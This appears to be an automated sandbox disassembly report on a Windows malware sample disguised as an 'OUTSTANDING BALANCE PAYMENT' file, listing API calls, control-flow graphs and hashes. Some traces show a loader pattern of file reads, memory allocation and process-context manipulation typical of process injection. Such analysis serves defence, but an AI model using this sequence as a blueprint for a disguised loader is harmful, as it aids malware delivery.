                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0028380B
                                                                  • CreatePopupMenu.USER32 ref: 0028381F
                                                                  • PostQuitMessage.USER32(00000000), ref: 0028382E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: 9cb322b561efcf9a7dfdcb23a117f7d3bf9a6337baf0473c3e14c23db45850ea
                                                                  • Instruction ID: 3d94fe15de9706493a8c680f050390282c916617e653bccdac3e18bf773838e4
                                                                  • Opcode Fuzzy Hash: 9cb322b561efcf9a7dfdcb23a117f7d3bf9a6337baf0473c3e14c23db45850ea
                                                                  • Instruction Fuzzy Hash: 3A4138FD13260AA7DB16FF68EC49B7A7A99F701B40F400125FA02DA1D1DA65EDB08721

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00283E79
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00283E88
                                                                  • LoadIconW.USER32(00000063), ref: 00283E9E
                                                                  • LoadIconW.USER32(000000A4), ref: 00283EB0
                                                                  • LoadIconW.USER32(000000A2), ref: 00283EC2
                                                                    • Part of subcall function 00284024: LoadImageW.USER32(00280000,00000063,00000001,00000010,00000010,00000000), ref: 00284048
                                                                  • RegisterClassExW.USER32(?), ref: 00283F30
                                                                    • Part of subcall function 00283F53: GetSysColorBrush.USER32(0000000F), ref: 00283F86
                                                                    • Part of subcall function 00283F53: RegisterClassExW.USER32(00000030), ref: 00283FB0
                                                                    • Part of subcall function 00283F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00283FC1
                                                                    • Part of subcall function 00283F53: InitCommonControlsEx.COMCTL32(?), ref: 00283FDE
                                                                    • Part of subcall function 00283F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00283FEE
                                                                    • Part of subcall function 00283F53: LoadIconW.USER32(000000A9), ref: 00284004
                                                                    • Part of subcall function 00283F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00284013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: e0bf956525783b466c2e573b716d8cc3eec6492222fbb9aceff0cb7a9f9692f5
                                                                  • Instruction ID: 6f0b858c17a24ca33d6ef387c069909002ab78dbc3263266118fc25838307470
                                                                  • Opcode Fuzzy Hash: e0bf956525783b466c2e573b716d8cc3eec6492222fbb9aceff0cb7a9f9692f5
                                                                  • Instruction Fuzzy Hash: 6521B8B8D00304AFCB52DFE9EC45A9ABFF9FB09714F00411AE204AB2A0DB745580CF91

                                                                  Control-flow Graph

                                                                  control_flow_graph 1026 1227dd8-1227e86 call 1225808 1029 1227e8d-1227eb3 call 1228ce8 CreateFileW 1026->1029 1032 1227eb5 1029->1032 1033 1227eba-1227eca 1029->1033 1034 1228005-1228009 1032->1034 1038 1227ed1-1227eeb VirtualAlloc 1033->1038 1039 1227ecc 1033->1039 1036 122804b-122804e 1034->1036 1037 122800b-122800f 1034->1037 1040 1228051-1228058 1036->1040 1041 1228011-1228014 1037->1041 1042 122801b-122801f 1037->1042 1043 1227ef2-1227f09 ReadFile 1038->1043 1044 1227eed 1038->1044 1039->1034 1045 122805a-1228065 1040->1045 1046 12280ad-12280c2 1040->1046 1041->1042 1047 1228021-122802b 1042->1047 1048 122802f-1228033 1042->1048 1053 1227f10-1227f50 VirtualAlloc 1043->1053 1054 1227f0b 1043->1054 1044->1034 1055 1228067 1045->1055 1056 1228069-1228075 1045->1056 1049 12280d2-12280da 1046->1049 1050 12280c4-12280cf VirtualFree 1046->1050 1047->1048 1051 1228043 1048->1051 1052 1228035-122803f 1048->1052 1050->1049 1051->1036 1052->1051 1057 1227f52 1053->1057 1058 1227f57-1227f72 call 1228f38 1053->1058 1054->1034 1055->1046 1059 1228077-1228087 1056->1059 1060 1228089-1228095 1056->1060 1057->1034 1066 1227f7d-1227f87 1058->1066 1062 12280ab 1059->1062 1063 12280a2-12280a8 1060->1063 1064 1228097-12280a0 1060->1064 1062->1040 1063->1062 1064->1062 1067 1227fba-1227fce call 1228d48 1066->1067 1068 1227f89-1227fb8 call 1228f38 1066->1068 1074 1227fd2-1227fd6 1067->1074 1075 1227fd0 1067->1075 1068->1066 1076 1227fe2-1227fe6 1074->1076 1077 1227fd8-1227fdc CloseHandle 1074->1077 1075->1034 1078 1227ff6-1227fff 1076->1078 1079 1227fe8-1227ff3 VirtualFree 1076->1079 1077->1076 1078->1029 1078->1034 1079->1078
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01227EA9
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 012280CF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction ID: 4c7f82b61474bbf3a6039f9aa2776e89aa663d6cc366c2dffdf4d6bc4a77b34c
                                                                  • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction Fuzzy Hash: 54A11B70E14219EBDB14CFA4C899BEEBBB5FF48304F208159E605BB281D7799A41CF64

                                                                  Control-flow Graph

                                                                  control_flow_graph 1135 2849fb-284a25 call 28bcce RegOpenKeyExW 1138 2f41cc-2f41e3 RegQueryValueExW 1135->1138 1139 284a2b-284a2f 1135->1139 1140 2f4246-2f424f RegCloseKey 1138->1140 1141 2f41e5-2f4222 call 29f4ea call 2847b7 RegQueryValueExW 1138->1141 1146 2f423d-2f4245 call 2847e2 1141->1146 1147 2f4224-2f423b call 286a63 1141->1147 1146->1140 1147->1146
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00284A1D
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002F41DB
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002F421A
                                                                  • RegCloseKey.ADVAPI32(?), ref: 002F4249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpen
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                  • API String ID: 1586453840-614718249
                                                                  • Opcode ID: 02708be1f36c311ecdb9def3be2272e2cf6f6ecdaeab8318d2da41407665ce4f
                                                                  • Instruction ID: 4748d23f9978b480093f5bc090c5a19176ba52abd646062b6e85352f375cb79c
                                                                  • Opcode Fuzzy Hash: 02708be1f36c311ecdb9def3be2272e2cf6f6ecdaeab8318d2da41407665ce4f
                                                                  • Instruction Fuzzy Hash: 14119D75A11109BFEB05ABA4CD96DFF7BACEF04344F000029B506D6191EAB09E519B50

                                                                  Control-flow Graph

                                                                  control_flow_graph 1162 2836b8-283728 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002836E6
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00283707
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 0028371B
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 00283724
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: 698483619a148131cdffe40f178cc697ece20e081bebc0158b4867c20b5fcfc0
                                                                  • Instruction ID: 9d800a1b2af05b4ed02e8e913c63c9501062b34cbaf832b58b86322dbc96f012
                                                                  • Opcode Fuzzy Hash: 698483619a148131cdffe40f178cc697ece20e081bebc0158b4867c20b5fcfc0
                                                                  • Instruction Fuzzy Hash: 8AF0DA795806D07AE7325B97AC08E672E7DD7C7F24F00001BBA04AA1A0C96528D5DAB1

                                                                  Control-flow Graph

                                                                  control_flow_graph 1267 1227bb8-1227ccd call 1225808 call 1227aa8 CreateFileW 1274 1227cd4-1227ce4 1267->1274 1275 1227ccf 1267->1275 1278 1227ce6 1274->1278 1279 1227ceb-1227d05 VirtualAlloc 1274->1279 1276 1227d84-1227d89 1275->1276 1278->1276 1280 1227d07 1279->1280 1281 1227d09-1227d20 ReadFile 1279->1281 1280->1276 1282 1227d22 1281->1282 1283 1227d24-1227d5e call 1227ae8 call 1226aa8 1281->1283 1282->1276 1288 1227d60-1227d75 call 1227b38 1283->1288 1289 1227d7a-1227d82 ExitProcess 1283->1289 1288->1289 1289->1276
                                                                  APIs
                                                                    • Part of subcall function 01227AA8: Sleep.KERNELBASE(000001F4), ref: 01227AB9
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01227CC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: 6WCOTN938O4J1R3
                                                                  • API String ID: 2694422964-792878379
                                                                  • Opcode ID: 04c100fcaf0477a5ff3ecec8c3cb448a3dd640812fc232ae9de1d39a811513e8
                                                                  • Instruction ID: 98890cb02ae996a14f6af44822124b70e0189601b03ca0879fe540ecf378112e
                                                                  • Opcode Fuzzy Hash: 04c100fcaf0477a5ff3ecec8c3cb448a3dd640812fc232ae9de1d39a811513e8
                                                                  • Instruction Fuzzy Hash: 07517331D14259EBEF11DBA4C815BFEBBB4AF55300F004199E608BB2C0D7B91B45CB65

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00285374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00341148,?,002861FF,?,00000000,00000001,00000000), ref: 00285392
                                                                    • Part of subcall function 002849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00284A1D
                                                                  • _wcscat.LIBCMT ref: 002F2D80
                                                                  • _wcscat.LIBCMT ref: 002F2DB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                  • String ID: 8!4$\$\Include\
                                                                  • API String ID: 3592542968-2927916707
                                                                  • Opcode ID: 186ab09a072b2d7af8a634cb5cdee30281e2200caec9497aaa2f4781ce9704ab
                                                                  • Instruction ID: 097dc13d9115bdbc6297eceeafcd56fd4cf22017f4a88867b4ea33ef31f944c4
                                                                  • Opcode Fuzzy Hash: 186ab09a072b2d7af8a634cb5cdee30281e2200caec9497aaa2f4781ce9704ab
                                                                  • Instruction Fuzzy Hash: B151717D4253408FC316EF55D9818ABB3F8BE5A304F80492EF644A72A1EF70A558CF62
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0028522F
                                                                  • _wcscpy.LIBCMT ref: 00285283
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00285293
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002F3CB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 1053898822-1585850449
                                                                  • Opcode ID: 178f30325c567bd92d3678652ee538215a3c80d09293dc4c2ce87b4f4a00a3a0
                                                                  • Instruction ID: 403abafdbb53f1b88fce1f9500e26db360b5374cf7982eb0e9f08340faa137b2
                                                                  • Opcode Fuzzy Hash: 178f30325c567bd92d3678652ee538215a3c80d09293dc4c2ce87b4f4a00a3a0
                                                                  • Instruction Fuzzy Hash: D131D039029B516FD322FB60DC46FDAB7DCAF45310F00451AF589960D1EF70A6A8CB92
                                                                  APIs
                                                                    • Part of subcall function 002841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002839FE,?,00000001), ref: 002841DB
                                                                  • _free.LIBCMT ref: 002F36B7
                                                                  • _free.LIBCMT ref: 002F36FE
                                                                    • Part of subcall function 0028C833: __wsplitpath.LIBCMT ref: 0028C93E
                                                                    • Part of subcall function 0028C833: _wcscpy.LIBCMT ref: 0028C953
                                                                    • Part of subcall function 0028C833: _wcscat.LIBCMT ref: 0028C968
                                                                    • Part of subcall function 0028C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0028C978
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 805182592-1757145024
                                                                  • Opcode ID: 1f42515a9c3d63638b796fb978572b81ff9776fed3123b5786092610ce718227
                                                                  • Instruction ID: 6b7604c110d1a81485fd8c3b15b21641459623dfe4a8e1da61f79533877a4056
                                                                  • Opcode Fuzzy Hash: 1f42515a9c3d63638b796fb978572b81ff9776fed3123b5786092610ce718227
                                                                  • Instruction Fuzzy Hash: DA917D71920219AFCF04EFA4CC919FEB7B4BF19350F50402AF916AB291DB709A64CF60
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002F3725
                                                                  • GetOpenFileNameW.COMDLG32 ref: 002F376F
                                                                    • Part of subcall function 0028660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002853B1,?,?,002861FF,?,00000000,00000001,00000000), ref: 0028662F
                                                                    • Part of subcall function 002840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002840C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X$t33
                                                                  • API String ID: 3777226403-4182937556
                                                                  • Opcode ID: b0d3d28fbe1dca64048ab5630fa5c3c0eb96c8488be907735f1e5b765a816a4c
                                                                  • Instruction ID: c40bccd9649f753c5dd7ea9682faf772d54a65bec1e07e3e1f71bf0d3e1db7b9
                                                                  • Opcode Fuzzy Hash: b0d3d28fbe1dca64048ab5630fa5c3c0eb96c8488be907735f1e5b765a816a4c
                                                                  • Instruction Fuzzy Hash: 3421A875A211989FCF01FFD4C8457EEBBFC9F49304F00805AE505A7281DBB85A998F65
                                                                  APIs
                                                                  • __getstream.LIBCMT ref: 002A34FE
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 002A3539
                                                                  • __wopenfile.LIBCMT ref: 002A3549
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                  • String ID: <G
                                                                  • API String ID: 1820251861-2138716496
                                                                  • Opcode ID: d01aa2fd8da05824a7cd0b47eadf4d9463db510d21137cc4999f2e2ac78868cc
                                                                  • Instruction ID: 84b08f83bca8e4e1234622f9f91f11c50d2a3108e4759f606e18c71d60c84c75
                                                                  • Opcode Fuzzy Hash: d01aa2fd8da05824a7cd0b47eadf4d9463db510d21137cc4999f2e2ac78868cc
                                                                  • Instruction Fuzzy Hash: 8B11B270A203069BDB12FF749C4266E76A5AF4B360B158825F415D7181EF74CA319BA1
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0029D28B,SwapMouseButtons,00000004,?), ref: 0029D2BC
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0029D28B,SwapMouseButtons,00000004,?,?,?,?,0029C865), ref: 0029D2DD
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0029D28B,SwapMouseButtons,00000004,?,?,?,?,0029C865), ref: 0029D2FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: b8952f30ec51d214f5a522a0cf6a038fa1e1b901fff4d4c9dea2deaf5dec1906
                                                                  • Instruction ID: 2d8af8966e2ddcc9586ca5824e3311f3336223ac0dd5210976988df735cf18c4
                                                                  • Opcode Fuzzy Hash: b8952f30ec51d214f5a522a0cf6a038fa1e1b901fff4d4c9dea2deaf5dec1906
                                                                  • Instruction Fuzzy Hash: 70117975A21209BFDF218FA8CC84EAF7BBCEF04740F004469E805D7110E771AE50AB64
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01227263
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012272F9
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0122731B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction ID: 18ad6df7c0ed5e49eb90057a85cee7d2a12be9dfc3a3fba0411ac011a7e8d8ef
                                                                  • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction Fuzzy Hash: 20621F30A24259DBEB24CF64C851BEEB771EF68300F1091A9D60DEB390E7759E81CB59
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0029EBB2
                                                                    • Part of subcall function 002851AF: _memset.LIBCMT ref: 0028522F
                                                                    • Part of subcall function 002851AF: _wcscpy.LIBCMT ref: 00285283
                                                                    • Part of subcall function 002851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00285293
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0029EC07
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0029EC16
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002F3C88
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 0b4a246795eb3d47321e112f0527a91bf6e222b54584af8f6f53ecfc711f3ad7
                                                                  • Instruction ID: 41f1ba46353c297174d8a4c24caf9c9bd42580e9ceea926c7543c55af6bd1ca3
                                                                  • Opcode Fuzzy Hash: 0b4a246795eb3d47321e112f0527a91bf6e222b54584af8f6f53ecfc711f3ad7
                                                                  • Instruction Fuzzy Hash: 2921D7745147989FEB33DF28C859BE7FFEC9B01308F04049EE68E56282C7B46A948B51
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 002CC72F
                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002CC746
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 93456c3a48b682903c234f0882f65ab4d470e30d213ae06cbfd8b6587aaec0c5
                                                                  • Instruction ID: 7537f3a11bf5b6f8661aa211008da0d39ba6790d435c31fd04a79e3402d5bb9c
                                                                  • Opcode Fuzzy Hash: 93456c3a48b682903c234f0882f65ab4d470e30d213ae06cbfd8b6587aaec0c5
                                                                  • Instruction Fuzzy Hash: EBD05E7150030EABDB11AB90DC4EFCA77AC9700704F0005A1B650A50B1DBB4E6998B58
